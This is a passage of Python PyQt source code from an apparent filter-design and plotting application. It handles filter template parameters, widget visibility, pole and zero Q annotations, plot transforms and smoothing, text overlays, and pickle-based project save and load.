newFilter.validate()\n if not valid:\n self.pmptd.setErrorMsg(msg)\n self.pmptd.open()\n self.pmptd.setFocus()\n return\n ds = Dataset(filepath='', origin=newFilter, title=self.filtername_box.text())\n self.filters.append(ds)\n self.selfil_cb.blockSignals(True)\n self.stages_selfil_cb.blockSignals(True)\n self.selfil_cb.addItem(ds.title, ds)\n self.stages_selfil_cb.addItem(ds.title, ds)\n self.selfil_cb.blockSignals(False)\n self.stages_selfil_cb.blockSignals(False)\n self.chg_filter_btn.setEnabled(True)\n self.addDataset(ds)\n \n def makeFilterTemplateSymmetric(self):\n fa = [self.fa_min_box.value(), self.fa_max_box.value()]\n fp = [self.fp_min_box.value(), self.fp_max_box.value()]\n f0 = 0\n bw = [0, 0]\n if(self.tipo_box.currentIndex() == Filter.BAND_PASS):\n f0 = np.sqrt(fp[0] * fp[1])\n bw[0] = fp[1] - fp[0]\n if(fa[0] * fa[1] != f0**2):\n famincalc = f0**2 / fa[1]\n famaxcalc = f0**2 / fa[0]\n if(famincalc > fa[0]):\n fa[0] = famincalc\n elif(famaxcalc < fa[1]):\n fa[1] = famaxcalc\n bw[1] = fa[1] - fa[0]\n\n elif(self.tipo_box.currentIndex() == Filter.BAND_REJECT):\n f0 = np.sqrt(fa[0] * fa[1])\n bw[0] = fa[1] - fa[0]\n if(fp[0] * fp[1] != f0**2):\n fpmincalc = f0**2 / fp[1]\n fpmaxcalc = f0**2 / fp[0]\n if(fpmincalc > fp[0]):\n fp[0] = fpmincalc\n elif(fpmaxcalc < fp[1]):\n fp[1] = fpmaxcalc \n bw[1] = fp[1] - fp[0]\n\n self.fa_min_box.setValue(fa[0])\n self.fa_max_box.setValue(fa[1])\n self.fp_min_box.setValue(fp[0])\n self.fp_max_box.setValue(fp[1])\n self.f0_box.setValue(f0)\n self.bw_min_box.setValue(bw[0])\n self.bw_max_box.setValue(bw[1])\n\n def changeSelectedFilter(self):\n newFilter = self.buildFilterFromParams()\n valid, msg = newFilter.validate()\n if not valid:\n self.pmptd.setErrorMsg(msg)\n self.pmptd.setFocus()\n return\n temp_datalines = self.selected_dataset_data.datalines\n ds = Dataset('', self.filtername_box.text(), newFilter)\n ds.datalines = temp_datalines\n ds.title = self.filtername_box.text()\n self.selected_dataset_widget.setText(self.filtername_box.text())\n self.selfil_cb.setItemText(self.selfil_cb.currentIndex(), ds.title)\n self.stages_selfil_cb.setItemText(self.selfil_cb.currentIndex(), ds.title)\n self.selected_dataset_widget.setData(Qt.UserRole, ds)\n self.filters[self.selfil_cb.currentIndex()] = ds\n self.populateSelectedDatasetDetails(self.selected_dataset_widget, None)\n\n def updateFilterParametersAvailable(self):\n if self.tipo_box.currentIndex() == Filter.LOW_PASS or self.tipo_box.currentIndex() == Filter.HIGH_PASS:\n for i in range(Filter.LEGENDRE + 1):\n self.aprox_box.model().item(i).setEnabled(True)\n self.compareapprox_cb.model().item(i).setEnabled(True)\n for i in range(Filter.BESSEL, Filter.GAUSS + 1):\n self.aprox_box.model().item(i).setEnabled(False)\n self.compareapprox_cb.model().item(i).setEnabled(False)\n if not self.aprox_box.model().item(self.aprox_box.currentIndex()).isEnabled():\n self.aprox_box.setCurrentIndex(Filter.BUTTERWORTH)\n self.compareapprox_cb.setCurrentIndex(Filter.BUTTERWORTH)\n self.define_with_box.setVisible(False)\n self.label_definewith.setVisible(False)\n self.ap_box.setVisible(True)\n self.label_ap.setVisible(True)\n self.aa_box.setVisible(True)\n self.label_aa.setVisible(True)\n self.fp_box.setVisible(True)\n self.label_fp.setVisible(True)\n self.fa_box.setVisible(True)\n self.label_fa.setVisible(True)\n self.fa_min_box.setVisible(False)\n self.symmetrize_btn.setVisible(False)\n self.label_famin.setVisible(False)\n self.fa_max_box.setVisible(False)\n self.label_famax.setVisible(False)\n self.fp_min_box.setVisible(False)\n self.label_fpmin.setVisible(False)\n self.fp_max_box.setVisible(False)\n self.label_fpmax.setVisible(False)\n self.f0_box.setVisible(False)\n self.label_f0.setVisible(False)\n self.bw_min_box.setVisible(False)\n self.label_bwmin.setVisible(False)\n self.bw_max_box.setVisible(False)\n self.label_bwmax.setVisible(False)\n self.tau0_box.setVisible(False)\n self.label_tau0.setVisible(False)\n self.frg_box.setVisible(False)\n self.label_fRG.setVisible(False)\n self.tol_box.setVisible(False)\n self.label_tolerance.setVisible(False)\n\n elif self.tipo_box.currentIndex() == Filter.BAND_PASS or self.tipo_box.currentIndex() == Filter.BAND_REJECT:\n for i in range(Filter.LEGENDRE + 1):\n self.aprox_box.model().item(i).setEnabled(True)\n self.compareapprox_cb.model().item(i).setEnabled(True)\n for i in range(Filter.BESSEL, Filter.GAUSS + 1):\n self.aprox_box.model().item(i).setEnabled(False)\n self.compareapprox_cb.model().item(i).setEnabled(False)\n if not self.aprox_box.model().item(self.aprox_box.currentIndex()).isEnabled():\n self.aprox_box.setCurrentIndex(Filter.BUTTERWORTH)\n self.compareapprox_cb.setCurrentIndex(Filter.BUTTERWORTH)\n self.define_with_box.setVisible(True)\n self.label_definewith.setVisible(True)\n self.ap_box.setVisible(True)\n self.label_ap.setVisible(True)\n self.aa_box.setVisible(True)\n self.label_aa.setVisible(True)\n self.fp_box.setVisible(False)\n self.label_fp.setVisible(False)\n self.fa_box.setVisible(False)\n self.label_fa.setVisible(False)\n self.tau0_box.setVisible(False)\n self.label_tau0.setVisible(False)\n self.frg_box.setVisible(False)\n self.label_fRG.setVisible(False)\n self.tol_box.setVisible(False)\n self.label_tolerance.setVisible(False)\n\n if self.define_with_box.currentIndex() == Filter.TEMPLATE_FREQS:\n self.fa_min_box.setVisible(True)\n self.label_famin.setVisible(True)\n self.fa_max_box.setVisible(True)\n self.label_famax.setVisible(True)\n self.fp_min_box.setVisible(True)\n self.label_fpmin.setVisible(True)\n self.fp_max_box.setVisible(True)\n self.label_fpmax.setVisible(True)\n self.f0_box.setVisible(False)\n self.label_f0.setVisible(False)\n self.bw_min_box.setVisible(False)\n self.label_bwmin.setVisible(False)\n self.bw_max_box.setVisible(False)\n self.label_bwmax.setVisible(False)\n self.symmetrize_btn.setVisible(True)\n\n if self.define_with_box.currentIndex() == Filter.F0_BW:\n self.fa_min_box.setVisible(False)\n self.label_famin.setVisible(False)\n self.fa_max_box.setVisible(False)\n self.label_famax.setVisible(False)\n self.fp_min_box.setVisible(False)\n self.label_fpmin.setVisible(False)\n self.fp_max_box.setVisible(False)\n self.label_fpmax.setVisible(False)\n self.f0_box.setVisible(True)\n self.label_f0.setVisible(True)\n self.bw_min_box.setVisible(True)\n self.label_bwmin.setVisible(True)\n self.bw_max_box.setVisible(True)\n self.label_bwmax.setVisible(True)\n self.symmetrize_btn.setVisible(False)\n \n elif self.tipo_box.currentIndex() == Filter.GROUP_DELAY:\n for i in range(Filter.LEGENDRE + 1):\n self.aprox_box.model().item(i).setEnabled(False)\n self.compareapprox_cb.model().item(i).setEnabled(False)\n for i in range(Filter.BESSEL, Filter.GAUSS + 1):\n self.aprox_box.model().item(i).setEnabled(True)\n self.compareapprox_cb.model().item(i).setEnabled(True)\n if not self.aprox_box.model().item(self.aprox_box.currentIndex()).isEnabled():\n self.aprox_box.setCurrentIndex(Filter.BESSEL)\n self.compareapprox_cb.setCurrentIndex(Filter.BESSEL)\n \n self.define_with_box.setVisible(False)\n self.label_definewith.setVisible(False)\n self.ap_box.setVisible(False)\n self.label_ap.setVisible(False)\n self.aa_box.setVisible(False)\n self.label_aa.setVisible(False)\n self.fp_box.setVisible(False)\n self.label_fp.setVisible(False)\n self.fa_box.setVisible(False)\n self.label_fa.setVisible(False)\n self.fa_min_box.setVisible(False)\n self.label_famin.setVisible(False)\n self.fa_max_box.setVisible(False)\n self.label_famax.setVisible(False)\n self.fp_min_box.setVisible(False)\n self.label_fpmin.setVisible(False)\n self.fp_max_box.setVisible(False)\n self.label_fpmax.setVisible(False)\n self.f0_box.setVisible(False)\n self.label_f0.setVisible(False)\n self.bw_min_box.setVisible(False)\n self.label_bwmin.setVisible(False)\n self.bw_max_box.setVisible(False)\n self.label_bwmax.setVisible(False)\n self.tau0_box.setVisible(True)\n self.label_tau0.setVisible(True)\n self.frg_box.setVisible(True)\n self.label_fRG.setVisible(True)\n self.tol_box.setVisible(True)\n self.label_tolerance.setVisible(True)\n self.symmetrize_btn.setVisible(False)\n\n def condition_canvas(self, canvas, xlabel, ylabel, xscale='linear', yscale='linear', grid=True):\n canvas.ax.clear()\n canvas.ax.grid(grid, which=\"both\", linestyle=':')\n canvas.ax.set_xlabel(xlabel)\n canvas.ax.set_ylabel(ylabel)\n canvas.ax.set_xscale(xscale)\n canvas.ax.set_yscale(yscale)\n canvas.ax.xaxis.label.set_size(self.plt_labelsize_sb.value())\n canvas.ax.yaxis.label.set_size(self.plt_labelsize_sb.value())\n for label in (canvas.ax.get_xticklabels() + canvas.ax.get_yticklabels()):\n label.set_fontsize(self.plt_ticksize_sb.value())\n\n def updateFilterPlots(self):\n pass\n\n def updateFilterStages(self):\n pass\n\n def stage_sel_changed(self):\n pass\n \n def updateSelectedPolesFromPlot(self, s):\n pass\n\n def updateSelectedZerosFromPlot(self, s):\n pass\n\n def addFilterStage(self):\n pass\n\n def swapStagesUpwards(self):\n pass\n\n def swapStagesDownwards(self):\n pass\n\n def orderStagesBySos(self):\n pass\n\n def removeFilterStage(self):\n pass\n\n def formatPoleAnnotation(self, sel):\n sel.annotation.set_text('Pole {:d}\\n{:.2f}+j{:.2f}\\nQ={:.2f}'.format(sel.index, sel.target[0], sel.target[1], self.calcQ(sel.target)))\n\n def formatZeroAnnotation(self, sel):\n if(True or sel.target[0] == 0 and sel.target[1] == 0):\n sel.annotation.set_text('Zero {:d}\\n{:.2f}+j{:.2f}'.format(sel.index, sel.target[0], sel.target[1]))\n else:\n sel.annotation.set_text('Zero {:d}\\n{:.2f}+j{:.2f}\\nQ={:.2f}'.format(sel.index, sel.target[0], sel.target[1], self.calcQ(sel.target)))\n\n def calcQ(self, singRe, singIm):\n return self.calcQ(singRe + singIm*1j)\n\n def calcQ(self, sing):\n if(isinstance(sing, (list, tuple, np.ndarray))):\n sing = sing[0] + sing[1]*1j\n if(sing.real == 0):\n return inf\n elif(sing.real > 0):\n return -1\n else:\n return np.abs(sing)/(- 2 * sing.real)\n\n def updateStagePlots(self):\n pass\n\n def clearCanvas(self, canvas):\n canvas.ax.clear()\n canvas.ax.grid(True, which=\"both\", linestyle=':')\n\n def openCaseDialog(self):\n self.csd.open()\n self.csd.populate(ds = self.selected_dataset_data)\n # self.tfd.tf_title.setFocus()\n\n def resolveCSDialog(self):\n first_case = int(self.csd.case_first_cb.currentIndex())\n last_case = int(self.csd.case_last_cb.currentIndex())\n casenum = len(self.selected_dataset_data.data)\n dli = 0\n for x in range(self.dataset_list.count()):\n ds = self.dataset_list.item(x).data(Qt.UserRole)\n dli = dli + len(self.datalines[x])\n if(ds.origin == self.selected_dataset_data.origin):\n break\n color_iter = 0\n for case in range(first_case, min(last_case + 1, casenum)):\n dl = self.selected_dataset_data.create_dataline(case)\n qlwt = QListWidgetItem()\n dl.plots = self.csd.case_render_cb.currentIndex()\n dl.transform = self.csd.case_transform_cb.currentIndex()\n dl.xsource = self.csd.case_xdata_cb.currentText()\n dl.xscale = self.csd.case_xscale_sb.value()\n dl.xoffset = self.csd.case_xoffset_sb.value()\n dl.ysource = self.csd.case_ydata_cb.currentText()\n dl.yscale = self.csd.case_yscale_sb.value()\n dl.yoffset = self.csd.case_yoffset_sb.value()\n if(self.csd.case_randomcol_rb.isChecked()):\n dl.color = [\"#\"+''.join([random.choice('0123456789ABCDEF') for i in range(6)])][0]\n elif(self.csd.case_presetcol_rb.isChecked()):\n colorpalette_i = self.csd.case_palettecol_cb.currentIndex()\n colorpalette = self.csd.COLOR_LIST[colorpalette_i]\n dl.color = colorpalette[color_iter]\n color_iter += 1\n if(color_iter == len(colorpalette)):\n color_iter = 0\n else:\n dl.color = self.csd.color\n dl.linestyle = self.csd.case_style_cb.currentText()\n dl.linewidth = self.csd.case_linewidth_sb.value()\n dl.markerstyle = self.csd.case_marker_cb.currentText()\n dl.markersize = self.csd.case_markersize_sb.value()\n if(self.csd.case_inforname_rb.isChecked()):\n dstitle = self.selected_dataset_data.title \n dscases = self.selected_dataset_data.casenames\n if(case < len(dscases)):\n dl.name = dstitle + ' ' + dscases[case]\n qlwt.setText(dl.name)\n dl.name = dl.name if self.csd.case_addlegend_cb.isChecked() else '_' + dl.name\n qlwt.setData(Qt.UserRole, dl)\n self.dataline_list.insertItem(dli, qlwt)\n self.datalines[self.dataset_list.currentRow()].append(dl)\n self.updatePlots()\n\n def populateSelectedDatasetDetails(self, listitemwidget, qlistwidget):\n if(not listitemwidget):\n self.setDatasetControlsStatus(False)\n self.ds_title_edit.setText('')\n self.ds_casenum_lb.setText('0')\n self.ds_info_lb.setText('')\n return\n self.setDatasetControlsStatus(True)\n self.ds_title_edit.setText(listitemwidget.text())\n self.selected_dataset_widget = listitemwidget\n self.selected_dataset_data = listitemwidget.data(Qt.UserRole)\n isTF = self.selected_dataset_data.type in ['TF', 'filter']\n self.ds_poleszeros_btn.setEnabled(isTF)\n self.resp_btn.setEnabled(isTF)\n self.ds_casenum_lb.setText(str(len(self.selected_dataset_data.data)))\n self.ds_caseadd_btn.setVisible(len(self.selected_dataset_data.data) > 1)\n self.ds_info_lb.setText(self.selected_dataset_data.miscinfo)\n\n #relleno las cajas del filtro\n if(self.selected_dataset_data.type == 'filter'):\n self.populateSelectedFilterDetails()\n\n def populateSelectedFilterDetails(self, index=-2):\n pass\n\n def updateSelectedDatasetName(self):\n new_title = self.ds_title_edit.text()\n self.selected_dataset_widget.setText(new_title)\n self.selected_dataset_data.title = new_title\n if(self.selected_dataset_data.type == 'filter'):\n self.selfil_cb.setItemText(self.selfil_cb.currentIndex(), new_title)\n self.stages_selfil_cb.setItemText(self.stages_selfil_cb.currentIndex(), new_title)\n self.filtername_box.setText(new_title)\n\n def populateSelectedDatalineDetails(self, listitemwidget, qlistwidget):\n if(not listitemwidget):\n self.setDatalineControlsStatus(False)\n self.dl_name_edit.setText('')\n return\n self.setDatalineControlsStatus(True)\n self.dl_xscale_sb.blockSignals(True)\n self.dl_yscale_sb.blockSignals(True)\n self.dl_xoffset_sb.blockSignals(True)\n self.dl_yoffset_sb.blockSignals(True)\n self.dl_linewidth_sb.blockSignals(True)\n self.dl_markersize_sb.blockSignals(True)\n self.dl_savgol_wlen.blockSignals(True)\n self.dl_savgol_ord.blockSignals(True)\n\n self.selected_dataline_widget = listitemwidget\n self.selected_dataline_data = listitemwidget.data(Qt.UserRole) #de aca\n dl_type = self.selected_dataline_data.dataset.type\n\n self.dl_transform_cb.clear()\n if (dl_type == 'function'):\n self.dl_type_flag = 1\n opciones = [\"None\", \"1st derivate\", \"2nd derivate\"]\n elif (dl_type == 'line' or dl_type == 'pt'):\n self.dl_type_flag = 2\n opciones = [\"None\"]\n else:\n self.dl_type_flag = 0\n opciones = [\"None\", \"|.|\", \"Arg(.)\", \"unwrap Arg(.)\", \"20log(.)\", \"20log(|.|)\", \"unwrap(.)\"]\n \n self.dl_transform_cb.addItems(opciones)\n\n self.dl_name_edit.setText(self.selected_dataline_widget.text())\n self.dl_render_cb.setCurrentIndex(self.selected_dataline_data.plots)\n \n self.dl_xdata_cb.clear()\n self.dl_ydata_cb.clear()\n self.dl_xdata_cb.addItems(self.selected_dataline_data.dataset.fields)\n self.dl_ydata_cb.addItems(self.selected_dataline_data.dataset.fields)\n \n self.dl_transform_cb.setCurrentIndex(self.selected_dataline_data.transform)\n self.dl_xdata_cb.setCurrentText(self.selected_dataline_data.xsource)\n self.dl_xscale_sb.setValue(self.selected_dataline_data.xscale)\n self.dl_xoffset_sb.setValue(self.selected_dataline_data.xoffset)\n self.dl_ydata_cb.setCurrentText(self.selected_dataline_data.ysource)\n self.dl_yscale_sb.setValue(self.selected_dataline_data.yscale)\n self.dl_yoffset_sb.setValue(self.selected_dataline_data.yoffset)\n self.dl_color_edit.setText(self.selected_dataline_data.color)\n self.dl_style_cb.setCurrentText(self.selected_dataline_data.linestyle)\n self.dl_linewidth_sb.setValue(self.selected_dataline_data.linewidth)\n self.dl_marker_cb.setCurrentText(self.selected_dataline_data.markerstyle)\n self.dl_markersize_sb.setValue(self.selected_dataline_data.markersize)\n self.dl_color_label.setStyleSheet(f'background-color: {self.selected_dataline_data.color}')\n self.dl_savgol_wlen.setValue(self.selected_dataline_data.savgolwindow)\n self.dl_savgol_ord.setValue(self.selected_dataline_data.savgolord)\n \n self.dl_xscale_sb.blockSignals(False)\n self.dl_yscale_sb.blockSignals(False)\n self.dl_xoffset_sb.blockSignals(False)\n self.dl_yoffset_sb.blockSignals(False)\n self.dl_linewidth_sb.blockSignals(False)\n self.dl_markersize_sb.blockSignals(False)\n self.dl_savgol_wlen.blockSignals(False)\n self.dl_savgol_ord.blockSignals(False)\n\n def updateSelectedDataline(self):\n self.saveFile(True)\n if(not self.selected_dataline_widget):\n return\n new_name = self.dl_name_edit.text()\n self.selected_dataline_widget.setText(new_name)\n self.selected_dataline_data.name = new_name\n self.selected_dataline_data.plots = self.dl_render_cb.currentIndex()\n self.selected_dataline_data.transform = self.dl_transform_cb.currentIndex()\n self.selected_dataline_data.xsource = self.dl_xdata_cb.currentText()\n self.selected_dataline_data.xscale = self.dl_xscale_sb.value()\n self.selected_dataline_data.xoffset = self.dl_xoffset_sb.value()\n self.selected_dataline_data.ysource = self.dl_ydata_cb.currentText()\n self.selected_dataline_data.yscale = self.dl_yscale_sb.value()\n self.selected_dataline_data.yoffset = self.dl_yoffset_sb.value()\n self.selected_dataline_data.color = self.dl_color_edit.text()\n self.selected_dataline_data.linestyle = self.dl_style_cb.currentText()\n self.selected_dataline_data.linewidth = self.dl_linewidth_sb.value()\n self.selected_dataline_data.markerstyle = self.dl_marker_cb.currentText()\n self.selected_dataline_data.markersize = self.dl_markersize_sb.value()\n self.selected_dataline_data.savgolwindow = self.dl_savgol_wlen.value()\n self.selected_dataline_data.savgolord = self.dl_savgol_ord.value()\n self.populateSelectedDatalineDetails(self.selected_dataline_widget, None)\n self.updatePlots()\n\n \n def openColorPicker(self, origin):\n dialog = QColorDialog(self)\n dialog.setCurrentColor(Qt.red)\n dialog.setOption(QColorDialog.ShowAlphaChannel)\n dialog.open()\n dialog.currentColorChanged.connect(self.updateDatalineColor)\n\n def updateDatalineColor(self, color):\n self.dl_color_edit.setText(color.name())\n self.dl_color_label.setStyleSheet(f'background-color: {color.name()}')\n self.selected_dataline_data.color = color.name()\n self.updatePlots()\n\n def setDatasetControlsStatus(self, enabled=True):\n self.ds_title_edit.setEnabled(enabled)\n self.ds_addline_btn.setEnabled(enabled)\n self.ds_caseadd_btn.setEnabled(enabled)\n self.ds_remove_btn.setEnabled(enabled)\n\n def setDatalineControlsStatus(self, enabled=True):\n self.dl_name_edit.setEnabled(enabled)\n self.dl_render_cb.setEnabled(enabled)\n self.dl_transform_cb.setEnabled(enabled)\n self.dl_xdata_cb.setEnabled(enabled)\n self.dl_xscale_sb.setEnabled(enabled)\n self.dl_xoffset_sb.setEnabled(enabled)\n self.dl_ydata_cb.setEnabled(enabled)\n self.dl_yscale_sb.setEnabled(enabled)\n self.dl_yoffset_sb.setEnabled(enabled)\n self.dl_color_edit.setEnabled(enabled)\n self.dl_color_pickerbtn.setEnabled(enabled)\n self.dl_style_cb.setEnabled(enabled)\n self.dl_linewidth_sb.setEnabled(enabled)\n self.dl_marker_cb.setEnabled(enabled)\n self.dl_markersize_sb.setEnabled(enabled)\n self.dl_savgol_wlen.setEnabled(enabled)\n self.dl_savgol_ord.setEnabled(enabled)\n self.dl_remove_btn.setEnabled(enabled)\n\n def getPlotFromIndex(self, plotnum):\n x = plotnum\n tab = 0\n for tab_plots in self.plots_canvases:\n if(x - len(tab_plots) >= 0):\n tab += 1\n x -= len(tab_plots)\n else:\n break\n return self.plots_canvases[tab][x]\n\n def autoscalePlots(self):\n processedCanvas = [x.canvas for x in self.plots_canvases[self.tabbing_plots.currentIndex()]]\n for canvas in processedCanvas:\n canvas.ax.margins(self.plt_marginx.value(), self.plt_marginy.value())\n canvas.ax.relim()\n canvas.ax.autoscale()\n self.updatePlots()\n\n def changeLabelSize(self):\n # plt.rcParams.update({'font.size': self.plt_labelsize_sb.value()})\n self.updatePlots()\n\n def updatePlots(self):\n self.saveFile(True)\n processedCanvas = [x.canvas for x in self.plots_canvases[self.tabbing_plots.currentIndex()]]\n for canvas in processedCanvas:\n plotlist = []\n for artist in canvas.ax.lines + canvas.ax.collections:\n artist.remove()\n for x in range(self.dataset_list.count()):\n ds = self.dataset_list.item(x).data(Qt.UserRole)\n for dl in ds.datalines:\n dl_canvas = self.getPlotFromIndex(dl.plots).canvas\n if(dl_canvas == canvas):\n \n for label in (canvas.ax.get_xticklabels() + canvas.ax.get_yticklabels()):\n label.set_fontsize(self.plt_ticksize_sb.value())\n canvas.ax.xaxis.label.set_size(self.plt_labelsize_sb.value())\n canvas.ax.yaxis.label.set_size(self.plt_labelsize_sb.value())\n canvas.ax.title.set_size(self.plt_titlesize_sb.value())\n\n x, y = ds.get_datapoints(dl.xsource, dl.ysource, dl.casenum)\n\n if(self.dl_type_flag == 0):\n if(dl.transform == 1):\n y = np.abs(y)\n elif(dl.transform == 2):\n y = np.angle(y, deg=True)\n elif(dl.transform == 3):\n y = np.unwrap(np.angle(y, deg=True), period=360)\n elif(dl.transform == 4):\n y = 20 * np.log10(y)\n elif(dl.transform == 5):\n y = 20 * np.log10(np.abs(y))\n elif(dl.transform == 6):\n y = np.unwrap(y, period=360)\n else:\n y = np.real(y)\n elif(self.dl_type_flag == 1):\n if(dl.transform == 1):\n x, y = self.derivate(x, y)\n elif(dl.transform == 2):\n x, y = self.derivate(x, y)\n x, y = self.derivate(x, y)\n else:\n y = np.real(y)\n elif(self.dl_type_flag == 2):\n y = np.real(y)\n\n if(dl.transform in [2,3,6]):\n canvas.ax.yaxis.set_major_locator(ticker.MaxNLocator(nbins='auto', steps=[1.8,2.25,4.5,9]))\n else:\n canvas.ax.yaxis.set_major_locator(ticker.AutoLocator())\n\n try:\n savgolw = int(dl.savgolwindow)\n if(savgolw <= len(x)):\n savgolo = int(dl.savgolord)\n y = y if savgolw <= savgolo else savgol_filter(y, savgolw, savgolo)\n except ValueError:\n pass\n\n try:\n line, = canvas.ax.plot(\n x * dl.xscale + dl.xoffset,\n y * dl.yscale + dl.yoffset,\n linestyle = LINE_STYLES[dl.linestyle],\n linewidth = dl.linewidth,\n marker = MARKER_STYLES[dl.markerstyle],\n markersize = dl.markersize,\n color = dl.color,\n label = dl.name,\n )\n if(dl.name != '' and dl.name[0] != '_'):\n plotlist.append(line)\n except ValueError:\n self.statusbar.showMessage('Wrong data source matching', 2000)\n if(self.plt_legendpos.currentText() == 'None'):\n canvas.ax.get_legend().remove()\n else:\n canvas.ax.legend(handles=plotlist, fontsize=self.plt_legendsize_sb.value(), loc=self.plt_legendpos.currentIndex())\n if(self.plt_grid.isChecked()):\n canvas.ax.grid(True, which=\"both\", linestyle=':')\n else:\n canvas.ax.grid(False)\n\n try:\n canvas.draw()\n except ParseSyntaxException or ValueError:\n pass\n\n\n #Updates and plots texts.\n def updateTexts(self):\n if self.textDialog.textList.count() and self.textDialog.textList.selectedItems():\n self.textDialog.errorMsgTxtDialog.setVisible(False)\n currentTextList = self.textDialog.textList.currentItem()\n currentTextIndex = self.textDialog.textList.row(currentTextList) # Detect the row of selected text.\n currentText = self.textDialog.textListArray[currentTextIndex]\n \n currentText.title = self.textDialog.textTitle.text()\n if currentText.title: # Set title only if not empty\n currentTextList.setText(currentText.title) \n currentText.x = self.textDialog.xValueText.value()\n currentText.y = self.textDialog.yValueText.value()\n currentText.text = self.textDialog.text.toPlainText()\n #currentText.color = \n currentText.size = self.textDialog.fontSize.value()\n currentText.ha = self.textDialog.HA.currentText()\n currentText.va = self.textDialog.VA.currentText()\n currentText.rotation = self.textDialog.textRotation.value()\n currentText.weight = self.textDialog.fontWeight.currentText()\n currentText.style = self.textDialog.style.currentText()\n currentText.opacity = self.textDialog.opacity.value() / 100\n \n #Add to canvas\n self.saveFile(True)\n \n processedCanvas = []\n for i in self.plots_canvases: # Process all canvas to an easy format to handle.\n for j in i:\n processedCanvas.append(j.canvas)\n \n if currentText.plotted == True: # Delete the previous instance of this text if there was one.\n currentText.textObject.remove()\n processedCanvas[currentText.plotNum].draw()\n \n # Plot text\n currentText.plotNum = self.textDialog.plotSelector.currentIndex()\n selectedCanvas = processedCanvas[currentText.plotNum]\n\n currentText.textObject = selectedCanvas.ax.text(currentText.x, currentText.y, currentText.text, ha=currentText.ha, va=currentText.va, rotation=currentText.rotation, fontsize=currentText.size, fontweight=currentText.weight, style=currentText.style, alpha=currentText.opacity, color=currentText.color)\n selectedCanvas.draw()\n \n currentText.plotted = True\n \n else:\n self.textDialog.errorMsgTxtDialog.setVisible(True)\n \n\n # Removes selected text in text dialog\n def removeText(self):\n if self.textDialog.textList.count() and self.textDialog.textList.selectedItems():\n currentTextList = self.textDialog.textList.currentItem()\n currentTextIndex = self.textDialog.textList.row(currentTextList) # Detect the row of selected text.\n currentText = self.textDialog.textListArray[currentTextIndex]\n\n self.saveFile(True)\n \n processedCanvas = []\n for i in self.plots_canvases: # Process all canvas to an easy format to handle.\n for j in i:\n processedCanvas.append(j.canvas)\n \n if currentText.plotted == True: # Delete the previous instance of this text if there was one.\n currentText.textObject.remove()\n processedCanvas[currentText.plotNum].draw()\n \n # Deletes text from list.\n listPositionText = self.textDialog.textList.currentItem() \n elementToRemove = self.textDialog.textList.row(listPositionText)\n del self.textDialog.textListArray[elementToRemove]\n self.textDialog.textList.takeItem(elementToRemove)\n self.updateTextDialog()\n \n \n if self.textDialog.textList.count() == 0:\n self.textDialog.updateButton.setEnabled(False)\n\n \n def closeTextDialog(self):\n self.textDialog.hide()\n \n #Edit color text\n def openColorPickerText(self, origin):\n dialog = QColorDialog(self)\n dialog.setCurrentColor(Qt.red)\n dialog.setOption(QColorDialog.ShowAlphaChannel)\n dialog.open()\n dialog.currentColorChanged.connect(self.updateTextColor)\n\n def updateTextColor(self, color):\n self.textDialog.colorValue.setText(color.name())\n self.textDialog.colorLabel.setStyleSheet(f'background-color: {color.name()}')\n if self.textDialog.textList.count() and self.textDialog.textList.selectedItems():\n currentTextList = self.textDialog.textList.currentItem()\n currentTextIndex = self.textDialog.textList.row(currentTextList) # Detect the row of selected text.\n currentText = self.textDialog.textListArray[currentTextIndex]\n currentText.color = color.name()\n \n # Updates the text dialog to match the properties of the selected text \n def updateTextDialog(self):\n if self.textDialog.textList.count() and self.textDialog.textList.selectedItems():\n currentTextList = self.textDialog.textList.currentItem()\n currentTextIndex = self.textDialog.textList.row(currentTextList) # Detect the row of selected text.\n currentText = self.textDialog.textListArray[currentTextIndex]\n self.textDialog.updateButton.setEnabled(True)\n if currentText.plotted == True:\n self.textDialog.textTitle.setText(currentText.title)\n self.textDialog.xValueText.setValue(currentText.x)\n self.textDialog.yValueText.setValue(currentText.y)\n self.textDialog.text.setPlainText(currentText.text)\n self.textDialog.fontSize.setValue(currentText.size)\n self.textDialog.HA.setCurrentText(currentText.ha)\n self.textDialog.VA.setCurrentText(currentText.va)\n self.textDialog.textRotation.setValue(currentText.rotation)\n self.textDialog.fontWeight.setCurrentText(currentText.weight)\n self.textDialog.style.setCurrentText(currentText.style)\n self.textDialog.opacity.setValue(currentText.opacity * 100)\n self.textDialog.colorValue.setText(currentText.color)\n self.textDialog.colorLabel.setStyleSheet(f'background-color: {currentText.color}')\n\n\n def derivate(self, x, y):\n\n dy = np.array([], dtype=np.float64)\n d = 0\n for i in range(x.shape[0]-1):\n d = np.float32((y[i+1] - y[i]) / (x[i+1] - x[i]))\n dy = np.append(dy, d)\n dx = x[:-1]\n\n return dx, dy\n\n def showZPWindow(self):\n zeros = self.selected_dataset_data.zeros[0]\n poles = self.selected_dataset_data.poles[0]\n self.zpWindow = ZPWindow(zeros, poles, self.selected_dataset_data.title)\n self.zpWindow.show()\n\n def newFile(self):\n self.droppedFiles = []\n self.datasets = []\n self.datalines = []\n self.selected_dataset_widget = {}\n self.selected_dataline_widget = {}\n self.selected_dataset_data = {}\n self.selected_dataline_data = {}\n self.zpWindow = type(ZPWindow, (), {})()\n self.updateAll()\n \n def saveFile(self, noprompt=False):\n if(noprompt):\n filename = 'temp.fto'\n else:\n filename, _ = QFileDialog.getSaveFileName(self,\"Save File\", \"\",\"Filter tool file (*.fto)\")\n if(not filename): return\n with open(filename, 'wb') as f:\n flat_plots_canvas = [item.canvas for sublist in self.plots_canvases for item in sublist]\n plots_data = []\n for canv in flat_plots_canvas:\n plots_data.append(canv.get_properties())\n general_config = {\n 'labelsize_sb': self.plt_labelsize_sb.value(),\n 'legendsize_sb': self.plt_legendsize_sb.value(),\n 'ticksize_sb': self.plt_ticksize_sb.value(),\n 'titlesize_sb': self.plt_titlesize_sb.value(),\n 'legendpos': self.plt_legendpos.currentIndex(),\n 'grid': self.plt_grid.isChecked(),\n 'marginx': self.plt_marginx.value(),\n 'marginy': self.plt_marginy.value() \n }\n texts = [self.textDialog.textList.item(i).text() for i in range(self.textDialog.textList.count())]\n d = [self.datasets, self.datalines, plots_data, general_config, self.textDialog.textListArray, texts]\n pickle.dump(d, f, pickle.HIGHEST_PROTOCOL)\n\n def loadFile(self):\n filename, _ = QFileDialog.getOpenFileName(self,\"Select files\", \"\",\"Filter tool file (*.fto)\")\n if(not filename): return\n with open(filename, 'rb') as f:\n f.seek(0)\n self.datasets, self.datalines, plotdata, general_config, textListArray, textList = pickle.load(f)\n for t in textListArray:\n self.textDialog.textListArray.append(t) \n for t in textList:\n item = QListWidgetItem(t)\n 